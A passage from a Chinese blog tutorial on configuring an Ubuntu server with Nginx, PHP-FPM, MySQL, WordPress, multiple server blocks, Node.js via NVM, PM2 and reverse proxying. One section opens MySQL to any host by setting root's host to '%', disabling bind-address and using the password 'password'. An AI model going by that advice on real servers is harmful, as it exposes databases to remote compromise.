打开配置文件,找到cgi.fix_pathinfo,修改为:

cgi.fix_pathinfo=0

然后重启php环境:

sudo systemctl restart php7.0-fpm

Nginx中配置支持PHP

打开Nginx服务块配置文件:

sudo vim /etc/nginx/sites-available/default

修改文件为(具体修改可以参考这里的说明):

server {
    listen 80 default_server;
    listen [::]:80 default_server;

    root /var/www/html;
    index index.php index.html index.htm index.nginx-debian.html;

    server_name server_domain_or_IP;

    location / {
        try_files $uri $uri/ =404;
    }

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.0-fpm.sock;
    }

    location ~ /\.ht {
        deny all;
    }
}

修改完保存之后可以使用sudo nginx -t命令确认一下配置文件的正确性。
然后使用命令sudo systemctl reload nginx重启Nginx。

测试一下

新建文件/var/www/html/info.php,内容如下:

<?php
phpinfo();

然后访问 http://server_domain_or_IP/info.php查看结果。

安装Wordpress应用程序 (可选)

至此LEMP环境已经搭建完毕,下面我们简单介绍下在该环境上安装最为流行的博客程序wordpress的过程。本节仅供参考,如果不需要,可以不安装。

数据库及环境配置

创建数据库及新的数据库用户

mysql -u root -p

用密码登录成功之后执行下面的sql语句创建一个数据库,名叫wordpress

CREATE DATABASE wordpress DEFAULT CHARACTER SET utf8 COLLATE utf8_unicode_ci;

安全起见,我们为这个数据库创建一个单独的用户:

GRANT ALL ON wordpress.* TO 'wordpressuser'@'localhost' IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
EXIT;

在外网通过IP直接访问操作数据库

默认情况下,我们只能在服务器上通过localhost访问MySQL,如果需要通过IP从外网访问,需要进行相应的设置。

  1. 修改授权
GRANT ALL ON wordpress.* TO 'wordpressuser'@'%' IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
EXIT;

如果需要,还可以指定特定的IP地址(替换上面的%即可)。

或者可以直接修改表:

mysql -u root -p

mysql> use mysql;

mysql> update user set host = '%' where user = 'root';

mysql> select user, host from user;
+------------------+-----------+
| user             | host      |
+------------------+-----------+
| mysql.sys        | localhost |
| root             | localhost |
| wordpressuser    | %         |
+------------------+-----------+
3 rows in set (0.00 sec)
  1. 修改配置文件

配置文件位置为/etc/mysql/mysql.conf.d/mysqld.cnf,注释掉其中一行:

# bind-address  =127.0.0.1

重启MySQL即可:

sudo service mysql restart

配置Nginx

打开配置文件:

sudo vim /etc/nginx/sites-available/default

作如下修改(具体可以参考这里的说明

server {
    . . .

    location = /favicon.ico { log_not_found off; access_log off; }
    location = /robots.txt { log_not_found off; access_log off; allow all; }
    location ~* \.(css|gif|ico|jpeg|jpg|js|png)$ {
        expires max;
        log_not_found off;
    }
    . . .
}

对try_files做如下修改:

server {
    . . .
    location / {
        #try_files $uri $uri/ =404;
        try_files $uri $uri/ /index.php$is_args$args;
    }
    . . .
}

然后检查配置文件的正确性,并重启Nginx:

sudo nginx -t
//If no errors were reported, reload Nginx by typing:
sudo systemctl reload nginx

安装额外的PHP扩展

sudo apt-get update
sudo apt-get install php-curl php-gd php-mbstring php-mcrypt php-xml php-xmlrpc

安装完之后需要重启PHP-FPM,来使新的设置生效。

sudo systemctl restart php7.0-fpm

安装Wordpress

获取并安装wordpress源码

cd /tmp
curl -O https://wordpress.org/latest.tar.gz
tar xzvf latest.tar.gz
cp /tmp/wordpress/wp-config-sample.php /tmp/wordpress/wp-config.php
mkdir /tmp/wordpress/wp-content/upgrade
sudo cp -a /tmp/wordpress/. /var/www/html

调整文件权限和所有权

sudo chown -R dennis:www-data /var/www/html

我们还需要设置setgid来使目录下新创建的文件,和父级目录具有相同的权限:

sudo find /var/www/html -type d -exec chmod g+s {} \;

另外还需要对一些特殊的目录做处理:

cd /var/www/html
sudo chmod g+w ./wp-content
sudo chmod -R g+w ./wp-content/themes
sudo chmod -R g+w ./wp-content/plugins

设置secure key

我们可以用wordpress官方提供的工具生成secure key:

curl -s https://api.wordpress.org/secret-key/1.1/salt/

运行后得到如下结果:

define('AUTH_KEY',         'b?=x1eCLLa9c6f]%=8A$D^P=,y$+#)|XV2ffFo-sq8xY8M-a|6IE0_T-|!O.*Esa');
define('SECURE_AUTH_KEY',  'mF5CQ|m{(tWQQhK+_>d4UbJ5VU|], c)5^!wYbQ1WU+tBk8tFh]_<p#yZ|x;T{L%');
define('LOGGED_IN_KEY',    '(J<=P5mY3?>bqMqwk!]O=R+|]=8q^Hj/_+Dro=`-8XA[lBUQnt+Wk2MJnlC?$k&L');
define('NONCE_KEY',        'y,D2p24;-_g7-(Tu<X0HEPU:_({?JA4giAH@#<WPiVc=P%XwzB1.e|x#,l]1n2CO');
define('AUTH_SALT',        ')+fC8PF&FwD[*ux[ |YXxF-*!ds$uuy3TCzp|+-v_vt*-ox-6|A+A!]A*tJo^De=');
define('SECURE_AUTH_SALT', '4Ms!kC>.Y2*6fE+?;fE=>0BR~cB5J;C/6Sn177c(p%Q(Q6a-{I&[N,2Tn!ly.GgW');
define('LOGGED_IN_SALT',   '0nu||~mIX-++A;uS3bWde2-=A2+8=`c_(6JD_hJPf@9DiTiAu--W[wFb}+:P|[[+');
define('NONCE_SALT',       ' F=UmQao!jv(|#Di=A$Z6(l^_|z=wTnI2/P8<l7BO/IfiqX03!+hMqDa*6|hxog3');

拷贝到wp-config.php文件中替换相应的内容。

设置数据库信息及文件操作权限

wp-config.php文件中修改数据库信息,并添加FS_METHOD以便于Wordpress可以访问文件系统进行文件的读写操作,这在安装插件的时候会很有用。

define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'password');

define('FS_METHOD', 'direct');

然后我们就可以访问http://server_domain_or_IP进行wordpress的安装了。

LEMP环境上配置多个站点

通常情况下我们需要在Web服务器上部署多个站点,使用多个不同的域名。下面将详细介绍在我们的LEMP环境上如何配置。

设置新的文档目录

默认情况下,在Ubuntu上的Nginx已经默认创建了一个server block,其文档目录为/var/www/html(我们在上面安装wordpress的时候使用的就是这个默认的server block)。

如果我们需要部署多个站点,那么就需要创建多个不同的server block。假如我们需要部署两个网站:

example.com
test.com

这样我们就需要设置两个新的文档目录。为统一起见,我们使用xxx.com/html这种目录结构形式:

sudo mkdir -p /var/www/example.com/html
sudo mkdir -p /var/www/test.com/html

修改一下这两个文档目录的权限:

sudo chown -R $USER:$USER /var/www/example.com/html
sudo chown -R $USER:$USER /var/www/test.com/html

这里用到了环境变量$USER,请确保没有使用root账号进行操作。

dennis@my-remote-server:~$ echo $USER
dennis

至此文档目录应该配置好了。如果需要,我们可以通过下面的命令设置一下上层目录的权限:

sudo chmod -R 755 /var/www

需要提醒的是,暂时不需要担心这两个测试域名是否可以访问的问题,后边我们会介绍在本地浏览器如何访问这两个测试域名。

为每个站点创建测试文件

创建文件/var/www/example.com/html/index.html,内容为:

<html>
    <head>
        <title>Welcome to Example.com!</title>
    </head>
    <body>
        <h1>Success!  The example.com server block is working!</h1>
    </body>
</html>

同样,创建文件/var/www/test.com/html/index.html,内容为:

<html>
 <head>
     <title>Welcome to Test.com!</title>
 </head>
 <body>
     <h1>Success!  The test.com server block is working!</h1>
 </body>
</html>

为每个站点创建server block文件

如前所述,默认情况下Nginx已经配置了一个默认的server block,因此我们可以将默认的server block配置文件拷贝过来稍作修改:

sudo cp /etc/nginx/sites-available/default /etc/nginx/sites-available/example.com

打开文件:

sudo vim /etc/nginx/sites-available/example.com

其内容如下:

server {
        listen 80 default_server;
        listen [::]:80 default_server;

        root /var/www/html;
        index index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }
}

对其内容稍作修改,修改之后内容如下:

server {
        listen 80;
        listen [::]:80;

        root /var/www/example.com/html;
        index index.html index.htm index.nginx-debian.html;

        server_name example.com www.example.com;

        location / {
                try_files $uri $uri/ =404;
        }
}

主要修改了几个地方:

  • 去掉了default_server字眼。一台服务器上只能有一个default_server的配置,因此我们保留系统最初的设置为默认设置。
  • 修改root目录.
  • 修改server_name.

针对第二个站点test.com也做类似修改。

sudo cp /etc/nginx/sites-available/example.com /etc/nginx/sites-available/test.com
sudo vim /etc/nginx/sites-available/test.com

激活两个站点的server block

使用如下命令:

sudo ln -s /etc/nginx/sites-available/example.com /etc/nginx/sites-enabled/
sudo ln -s /etc/nginx/sites-available/test.com /etc/nginx/sites-enabled/

这样这些文件(链接)就位于激活的目录内了。到目前为止我们有3个激活了的server block了。服务器根据listen指令和server_name来确定该访问那个目录。

  • example.com: 响应来自example.com以及www.example.com的请求
  • test.com: 响应来自test.com以及www.test.com的请求
  • default: 响应没有匹配到上面两个规则的80端口的请求。

另外,还需要在nginx配置文件/etc/nginx/nginx.conf中设置下server_names_hash_bucket_size:

http {
    . . .

    server_names_hash_bucket_size 64;

    . . .
}

然后检查下nginx配置文件的正确性:

sudo nginx -t

重启一下nginx使修改生效:

sudo systemctl restart nginx

关于Nginx更多的指令介绍可以参考这个教程

本地测试

由于example.comtest.com这两个域名并非我们真实拥有的域名,因此需要在本地机器修改下hosts来测试访问。
以Mac为例,修改/etc/hosts文件:

127.0.0.1   localhost
. . .

XXX.XXX.XXX.XXX example.com www.example.com
XXX.XXX.XXX.XXX test.com www.test.com

前面的XXX.XXX.XXX.XXX即为服务器的外网IP。
现在我们就可以直接访问example.comtest.com来查看这两个站点了。

Tips: 关于真实域名相关的设置,有需要可以参考这篇文章.

配置二级子域名及代理访问

举例来说,比如我们在我的服务器上有两个web程序,一个是之前的 example.com,另一个程序是nodejs应用,使用端口5555,需要映射到二级域名 demo.example.com。我们应该如何设置呢?

1)添加域名解析

这个步骤不多说了,在域名服务提供商网站添加一条A记录,设置域名demo.example.com。

2)修改Nginx配置文件

就是我们上面提到的文件/etc/nginx/sites-available/example.com,添加如下内容:

server {  
    listen 80;
    server_name demo.example.com;

    location / {
        proxy_set_header   X-Real-IP $remote_addr;
        proxy_set_header   Host      $http_host;
        proxy_pass         http://127.0.0.1:5555;
    }
}

然后重启Nginx即可。

Ubuntu上安装和部署Node.js应用

安装Node.js

通过apt-get的方式安装

在ubuntu上可以使用apt-get安装Node.js:

sudo apt-get update
sudo apt-get install nodejs
sudo apt-get install npm

不过通过这种方式安装的Node.js会存在两个问题:

  • nodejs的版本比较老,目前我看到的是v4.2.6。
  • 在ubuntu上由于node这个名字被其他程序占用,因此要使用Node.js需要使用nodejs。
    如:
dennis@my-remote-server:~$ nodejs --version
v4.2.6

通过NVM安装

NVM顾名思义就是Node.js版本管理器(“Node.js version manager”),它可以让我们安装多个Node.js版本并且可以方便的随意切换。

安装NVM,首先需要安装一些依赖包:

sudo apt-get update
sudo apt-get install build-essential libssl-dev

然后从NVM的Github repo里拿到安装脚本。

curl -sL https://raw.githubusercontent.com/creationix/nvm/v0.31.4/install.sh -o install_nvm.sh

目前我看到的最新版本是0.31.4. 你可以修改为当前的最新版本。

然后执行脚本:

bash install_nvm.sh

该脚本会将NVM安装在~/.nvm目录,并且会对~/.profile文件做一些必要的修改,我们需要使其修改立即生效:

source ~/.profile

然后可以通过下面的命令查看当前可用的Node.js版本:

dennis@my-remote-server:~$ nvm ls-remote
        v5.10.0
        v5.10.1
        v5.11.0
        v5.11.1
        v5.12.0
         v6.0.0
         v6.1.0
         v6.2.0
         v6.2.1
         v6.2.2
         v6.3.0
         v6.3.1
         v6.4.0

最新版本为v6.4.0.
然后通过下面的命令安装最新版本:

nvm install 6.4.0

通常情况下,NVM会选择最近安装的版本来使用。当然我们也可以使用nvm use 6.4.0命令来切换版本。
可以使用命令nvm ls来查看当前环境已经安装的版本:

dennis@my-remote-server:~$ nvm ls
->       v6.4.0
default -> 6.4.0 (-> v6.4.0)
node -> stable (-> v6.4.0) (default)
stable -> 6.4 (-> v6.4.0) (default)
iojs -> N/A (default)

通过添加PPA的方式安装

这种方式暂时不做介绍,有兴趣可以参考这里的教程

创建一个简单的Node.js应用

我们创建一个简单的Node.js应用用于测试。新建一个文件hello.js:

#!/usr/bin/env nodejs
var http = require('http');
http.createServer(function (req, res) {
  res.writeHead(200, {'Content-Type': 'text/plain'});
  res.end('Hello World\n');
}).listen(8080, 'localhost');
console.log('Server running at http://localhost:8080/');

修改其可执行权限,并执行:

chmod +x ./hello.js
./hello.js

可以看到下面的提示:

Server running at http://localhost:8080/

说明服务启动正常,这时候可以通过http://:8080/IP_address:8080 来访问该应用。

使用PM2管理Node.js应用

PM2是优秀的Node.js应用管理工具,使用它可以轻松的管理服务器上的Node.js应用,并使其保持后台运行状态。

安装PM2

sudo npm install -g pm2

使用PM2

启动Node.js应用

可以使用pm2 start命令启动我们刚才创建的示例应用。

dennis@my-remote-server:~$ pm2 start hello.js
[PM2] Spawning PM2 daemon
[PM2] PM2 Successfully daemonized
[PM2] Starting hello.js in fork_mode (1 instance)
[PM2] Done.
┌──────────┬────┬──────┬──────┬────────┬─────────┬────────┬─────────────┬──────────┐
│ App name │ id │ mode │ pid  │ status │ restart │ uptime │ memory      │ watching │
├──────────┼────┼──────┼──────┼────────┼─────────┼────────┼─────────────┼──────────┤
│ hello    │ 0  │ fork │ 8689 │ online │ 0       │ 0s     │ 14.566 MB   │ disabled │
└──────────┴────┴──────┴──────┴────────┴─────────┴────────┴─────────────┴──────────┘
 Use `pm2 show <id|name>` to get more details about an app
dennis@my-remote-server:~$

设置服务器重启自动启动应用

比较值得一提的是,通过PM2启动的应用如果发生crash或者被其他程序杀掉了,会自动重新启动。但是需要注意的是,还需要做一点额外的工作,以便在系统重启之后也可以正常的将你的应用程序启动起来。这就是startup命令的作用了:

dennis@my-remote-server:~$ pm2 startup systemd
[PM2] You have to run this command as root. Execute the following command:
      sudo su -c "env PATH=$PATH:/home/dennis/.nvm/versions/node/v6.4.0/bin pm2 startup systemd -u dennis --hp /home/dennis"

执行之后会看到最后一行,是一条命令:

sudo su -c "env PATH=$PATH:/home/dennis/.nvm/versions/node/v6.4.0/bin pm2 startup systemd -u dennis --hp /home/dennis"

运行一下。成功之后我们可以通过命令sudo systemctl status pm2查看一下状态:

dennis@my-remote-server:~$ sudo systemctl status pm2
● pm2.service - PM2 next gen process manager for Node.js
   Loaded: loaded (/etc/systemd/system/pm2.service; enabled; vendor preset: enabled)
   Active: active (running) since Fri 2016-08-19 12:02:46 CST; 3min 9s ago
  Process: 10726 ExecStart=/usr/local/lib/node_modules/pm2/bin/pm2 resurrect (code=exited, status=0/SUCCESS)
 Main PID: 10732 (PM2 v1.1.3: God)
   CGroup: /system.slice/pm2.service
           ├─10732 PM2 v1.1.3: God Daemon
           └─10742 node /home/dennis/hello.js

Aug 19 12:02:46 my-remote-server pm2[10726]: [PM2] Resurrecting
Aug 19 12:02:46 my-remote-server pm2[10726]: [PM2] Restoring processes located in /home/dennis/.pm2/dump.pm2
Aug 19 12:02:46 my-remote-server pm2[10726]: [PM2] Process /home/dennis/hello.js restored
Aug 19 12:02:46 my-remote-server pm2[10726]: ┌──────────┬────┬──────┬───────┬────────┬─────────┬────────┬─────────────┬──────────┐
Aug 19 12:02:46 my-remote-server pm2[10726]: │ App name │ id │ mode │ pid   │ status │ restart │ uptime │ memory      │ watching │
Aug 19 12:02:46 my-remote-server pm2[10726]: ├──────────┼────┼──────┼───────┼────────┼─────────┼────────┼─────────────┼──────────┤
Aug 19 12:02:46 my-remote-server pm2[10726]: │ hello    │ 0  │ fork │ 10742 │ online │ 0       │ 0s     │ 14.566 MB   │ disabled │
Aug 19 12:02:46 my-remote-server pm2[10726]: └──────────┴────┴──────┴───────┴────────┴─────────┴────────┴─────────────┴──────────┘
Aug 19 12:02:46 my-remote-server pm2[10726]:  Use `pm2 show <id|name>` to get more details about an app
Aug 19 12:02:46 my-remote-server systemd[1]: Started PM2 next gen process manager for Node.js.
dennis@my-remote-server:~$

关于systemctl命令,强烈建议看下这个教程

踩坑提醒

如果出现下面的错误:

dennis@my-remote-server:~$ sudo su -c "env PATH=$PATH:/home/dennis/.nvm/versions/node/v6.4.0/bin pm2 startup systemd -u dennis --hp /home/dennis"
[PM2] Generating system init script in /etc/systemd/system/pm2.service
[PM2] Making script booting at startup...
[PM2] -systemd- Using the command:
      su dennis -c "pm2 dump && pm2 kill" && su root -c "systemctl daemon-reload && systemctl enable pm2 && systemctl start pm2"
Command failed: su dennis -c "pm2 dump && pm2 kill" && su root -c "systemctl daemon-reload && systemctl enable pm2 && systemctl start pm2"
/usr/bin/env: 'node': No such file or directory

----- Are you sure you use the right platform command line option ? centos / redhat, amazon, ubuntu, gentoo, systemd or darwin?

则可能是因为我们的node是使用nvm安装的原因。为/usr/bin/node添加一个软连接即可。

sudo ln -s  /home/dennis/.nvm/versions/node/v6.4.0/bin/node /usr/bin/node

PM2常用命令

停止应用
pm2 stop app_name_or_id
重启应用
pm2 restart app_name_or_id
列举应用
pm2 list
查看应用详情
pm2 info example
监控应用
pm2 monit

使用Nginx作Node.js应用程序的反向代理

创建Node.js应用程序

我们已经有了一个hello.js应用,于此类似,再创建一个foo.js的应用。创建文件foo.js,代码如下:

#!/usr/bin/env nodejs
var http = require('http');
http.createServer(function (req, res) {
  res.writeHead(200, {'Content-Type': 'text/plain'});
  res.end('Foo Bar\n');
}).listen(8081, 'localhost');
console.log('Server running at http://localhost:8081/');

监听端口8081. 启动该应用程序:

pm2 start foo.js

这个时候我们看到已经有两个Node.js应用在运行了:

dennis@my-remote-server:~$ pm2 list
┌──────────┬────┬──────┬───────┬────────┬─────────┬────────┬─────────────┬──────────┐
│ App name │ id │ mode │ pid   │ status │ restart │ uptime │ memory      │ watching │
├──────────┼────┼──────┼───────┼────────┼─────────┼────────┼─────────────┼──────────┤
│ hello    │ 0  │ fork │ 10742 │ online │ 0       │ 46m    │ 21.570 MB   │ disabled │
│ foo      │ 1  │ fork │ 10897 │ online │ 0       │ 8s     │ 20.051 MB   │ disabled │
└──────────┴────┴──────┴───────┴────────┴─────────┴────────┴─────────────┴──────────┘
 Use `pm2 show <id|name>` to get more details about an app

设置Nginx

前面我们讲过,Nginx的默认配置文件为/etc/nginx/sites-available/default。我们新建了两个站点,分别对应下面的配置文件:

/etc/nginx/sites-available/example.com
/etc/nginx/sites-available/test.com

这里我们可以修改默认的配置,也可以选择修改任意一个域名的配置。我们就以example.com为例。
/etc/nginx/sites-available/example.com文件的内容全部删除,并修改内容为:

server {
    listen 80;

    server_name example.com;

    location / {
        proxy_pass http://localhost:8080;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection 'upgrade';
        proxy_set_header Host $host;
        proxy_cache_bypass $http_upgrade;
    }
}

重新加载一下Nginx的配置使其生效:

sudo systemctl restart nginx

简单解释一下,这个配置的作用就是,监听服务器的80端口,并反向代理到8080端口去,也就是我们的hello应用。也就是说当用户通过浏览器访问http://example.com/的时候,将会将用户请求发给我们的hello.js应用,就会在页面上显示”Hello World”字样。

多应用设置

如果需要设置对多个Node.js应用的访问,我们可以在Nginx中增加响应的配置即可。以上面创建的foo.js应用为例:

location /app2 {
        proxy_pass http://localhost:8081;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection 'upgrade';
        proxy_set_header Host $host;
        proxy_cache_bypass $http_upgrade;
    }

使用命令sudo systemctl restart nginx重启nginx之后,就可以通过访问http://example.com/app2来查看foo.js应用的结果”Foo Bar”了。

写在最后

本文只是简单的带着大家配置一台可用的Web服务器,但是必然会有很多知识点没有涉及到。这就需要我们在碰到问题的时候多去Google了。比如下面的Topic,有兴趣的可以自行研究下。

  1. Linux/Ubuntu上的一键安装包,有些比较好用,比如lemp-wordpress-stack.
  2. Ubuntu上Docker的安装与使用
  3. 使用Let’s Encrypt进行全站HTTPS(可以参考这篇文章)
  4. 科学上网:ubuntu 16.04服务器上搭建Shadowsocks服务(如果大家感兴趣,后边再讲)
  5. 同时使用apache和nginx,可以参考这篇文章

Reference:

how-to-install-linux-nginx-mysql-php-lemp-stack-in-ubuntu-16-04
how-to-edit-the-sudoers-file-on-ubuntu-and-centos
how-to-set-up-a-host-name-with-digitalocean
how-to-host-multiple-websites-securely-with-nginx-and-php-fpm-on-ubuntu-14-04
how-to-configure-nginx-as-a-web-server-and-reverse-proxy-for-apache-on-one-ubuntu-16-04-server
how-to-install-nginx-on-ubuntu-16-04
how-to-install-node-js-on-ubuntu-16-04
systemd-essentials-working-with-services-units-and-the-journal
how-to-install-and-secure-phpmyadmin-on-ubuntu-16-04
how-to-secure-nginx-with-let-s-encrypt-on-ubuntu-16-04
lemp-stack-monitoring-with-monit-on-ubuntu-14-04
how-to-install-laravel-with-an-nginx-web-server-on-ubuntu-14-04
how-to-secure-nginx-on-ubuntu-14-04

作者:令狐葱001
链接:https://www.jianshu.com/p/3eeb365dd41b
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。